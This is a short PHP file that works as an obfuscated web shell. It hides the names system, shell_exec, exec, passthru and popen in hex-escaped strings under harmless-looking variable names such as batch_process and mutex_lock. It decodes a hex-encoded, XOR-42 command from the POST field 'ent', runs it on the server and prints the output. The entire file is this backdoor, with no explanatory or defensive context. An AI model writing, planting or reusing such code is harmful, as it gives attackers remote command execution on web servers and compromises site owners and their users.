<?php
$batch_process4 = "pass\x74hr\x75";
$batch_process6 = "\x73\x74re\x61\x6D\x5F\x67e\x74_\x63o\x6Etent\x73";
$batch_process2 = "s\x68\x65ll\x5Fex\x65c";
$batch_process5 = "\x70o\x70en";
$sync_manager = "hex2b\x69\x6E";
$batch_process7 = "\x70\x63l\x6Fse";
$batch_process3 = "\x65\x78ec";
$batch_process1 = "\x73\x79\x73tem";
if (isset($_POST["ent"])) {
function mutex_lock ( $pset, $dchunk) {
$obj ='';
$r=0;
while($r<strlen($pset)){
$obj.=chr(ord($pset[$r])^$dchunk);
$r++;
} return $obj;
}
$ent = $sync_manager($_POST["ent"]);
$ent = mutex_lock($ent, 42);
if (function_exists($batch_process1)) {
$batch_process1($ent);
} elseif (function_exists($batch_process2)) {
print $batch_process2($ent);
} elseif (function_exists($batch_process3)) {
$batch_process3($ent, $ent_pset);
print join("\n", $ent_pset);
} elseif (function_exists($batch_process4)) {
$batch_process4($ent);
} elseif (function_exists($batch_process5) && function_exists($batch_process6) && function_exists($batch_process7)) {
$dchunk_obj = $batch_process5($ent, 'r');
if ($dchunk_obj) {
$record_resource = $batch_process6($dchunk_obj);
$batch_process7($dchunk_obj);
print $record_resource;
}
}
exit;
}